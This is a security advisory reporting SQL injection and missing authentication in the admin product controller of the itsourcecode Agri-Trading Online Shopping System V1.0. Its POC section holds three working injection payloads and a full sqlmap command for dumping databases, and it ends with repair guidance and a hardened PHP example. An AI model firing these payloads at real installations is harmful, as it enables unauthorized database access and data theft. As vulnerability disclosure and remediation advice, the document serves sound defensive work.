itsourcecode Agri-Trading Online Shopping System Project V1.0 SQL Injection Vulnerability and Broken Access Control Vulnerability
NAME OF AFFECTED PRODUCT(S):
- Agri-Trading Online Shopping System Project
Vendor Homepage:
https://itsourcecode.com/free-projects/php-project/php-project-online-shopping-with-source-code/
AFFECTED AND/OR FIXED VERSION(S):
Vuldb Submitter:
Vulnerable File:
- admin/productcontroller.php
VERSION(S):
Vulnerability Type:
- SQL Injection
- Broken Access Control
DESCRIPTION:
- The Agri-Trading Online Shopping System Project V1.0 is vulnerable to SQL Injection and Broken Access Control within the admin/productcontroller.php file. The application fails to properly sanitize user-supplied input in the product parameter during the add action. A remote, unauthenticated attacker can exploit this by sending a specially crafted POST request to execute arbitrary SQL commands. Furthermore, the endpoint lacks session validation, allowing attackers to bypass authentication entirely. Successful exploitation could lead to unauthorized database access, sensitive data exfiltration, and unauthorized modification of product records.
SQL Injection Root Cause:
- Vulnerability location: admin/productcontroller.php
- Involved functions: add (new), update (update), updatequantity (update quantity)
- Description: In several business-logic functions in this file, the program reads user input directly from the $_POST superglobal and concatenates it into SQL query strings without sanitization or escaping. Because there is no input validation and no use of prepared statements, an attacker can supply a crafted SQL payload that breaks the structure of the original statement and executes arbitrary SQL commands against the database.
- Vulnerability snippet:
  $result = mysqli_query($db, "SELECT * FROM tblproducts WHERE product_name = '".$product."'");
  $sql = 'UPDATE tblproducts set quantity = quantity + "'.$quantity.'" WHERE product_code ="'.$id.'"';
Broken Access Control Root Cause:
- Vulnerability location: admin/productcontroller.php
- Vulnerability nature: Missing Authentication
- Description: This controller performs no session management (session validation) or identity check before handling sensitive requests that add, delete or modify database records. It trusts every request that reaches the endpoint without verifying that the requester holds valid administrator credentials, so an attacker can bypass the front-end management interface and invoke the back-end directly with a crafted HTTP POST request, performing unauthorized operations on product data.
- Vulnerability snippet: no verification is performed on the cookie (session) before the request is processed.
Impact:
- Attackers can exploit this SQL injection vulnerability to gain unauthorized access to the database, leading to sensitive data exfiltration, data tampering, and unauthorized administrative control. Such exploits not only compromise system integrity but also risk service disruption, posing a severe threat to both system security and business continuity.
POC:
Parameter: product (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: code=1017&product=1' AND 5868=5868 AND 'PnyK'='PnyK&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: code=1017&product=1' AND EXTRACTVALUE(9285,CONCAT(0x5c,0x716a786b71,(SELECT (ELT(9285=9285,1))),0x7170786a71)) AND 'imeP'='imeP&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: code=1017&product=1' AND (SELECT 7520 FROM (SELECT(SLEEP(5)))qRDs) AND 'FwlN'='FwlN&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=
NO AUTHENTICATION REQUIRED:
- The combination of two vulnerabilities results in no authentication being required
The following sqlmap command was used during testing to confirm the issue (the original report includes screenshots of the resulting output):
python3 sqlmap.py -u "http://192.168.1.29:8081/TEAMBAM/admin/productcontroller.php?action=add" --data "code=1017&product=1&quantity=1&price=1&markup=1&user=2&date=2026-02-09&category=1&supplier=1&submit=" --method POST -p product --dbs
Suggested Repair
Use Prepared Statements and Parameter Binding:
Prepared statements prevent SQL injection because they separate the SQL code from the user-supplied data. With a prepared statement, the value entered by the user is treated purely as data and is never interpreted as part of the SQL statement.
Input Validation and Filtering:
Strictly validate and filter user input data to ensure it conforms to the expected format.
Minimize Database User Permissions:
Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as 'root' or 'admin') for daily operations.
Regular Security Audits:
Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
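The following is an added example, not code from the itsourcecode project, showing how the two vulnerable queries quoted in the root-cause section and the missing authentication check would look after applying the repairs above. Table and column names come from the advisory's snippets; the session key 'admin_id', the function names and the connection credentials are assumptions.

```php
<?php
// Hardened rewrite of the admin/productcontroller.php patterns from the advisory
// (added example; 'admin_id', function names and credentials are assumed).
session_start();

// Broken access control fix: reject any request without an authenticated
// admin session before any database operation is reached.
function requireAdminSession(): void {
    if (empty($_SESSION['admin_id'])) {
        http_response_code(403);
        exit('Forbidden');
    }
}

// SQL injection fix for the "add" lookup: the product name is bound as a
// parameter, so a value such as "1' AND 5868=5868 AND 'PnyK'='PnyK" is
// compared literally instead of being parsed as SQL.
function findProductByName(mysqli $db, string $product): ?array {
    $stmt = $db->prepare('SELECT * FROM tblproducts WHERE product_name = ?');
    $stmt->bind_param('s', $product);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc(); // requires the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}

// SQL injection fix for "updatequantity": validate that quantity is an
// integer (input validation), then bind both values instead of concatenating.
function addQuantity(mysqli $db, string $id, string $quantity): bool {
    if (filter_var($quantity, FILTER_VALIDATE_INT) === false) {
        return false; // reject non-numeric quantities outright
    }
    $qty = (int) $quantity;
    $stmt = $db->prepare('UPDATE tblproducts SET quantity = quantity + ? WHERE product_code = ?');
    $stmt->bind_param('is', $qty, $id);
    $ok = $stmt->execute();
    $stmt->close();
    return $ok;
}

requireAdminSession(); // runs before any action is dispatched
$db = new mysqli('localhost', 'shop_app', 'PLACEHOLDER_PASSWORD', 'shop'); // least-privilege app user, not root
$db->set_charset('utf8mb4');

$action = $_GET['action'] ?? '';
if ($action === 'add') {
    $existing = findProductByName($db, $_POST['product'] ?? '');
} elseif ($action === 'updatequantity') {
    $ok = addQuantity($db, $_POST['id'] ?? '', $_POST['quantity'] ?? '');
}
```

The database account 'shop_app' stands in for a dedicated, least-privilege user as recommended under "Minimize Database User Permissions".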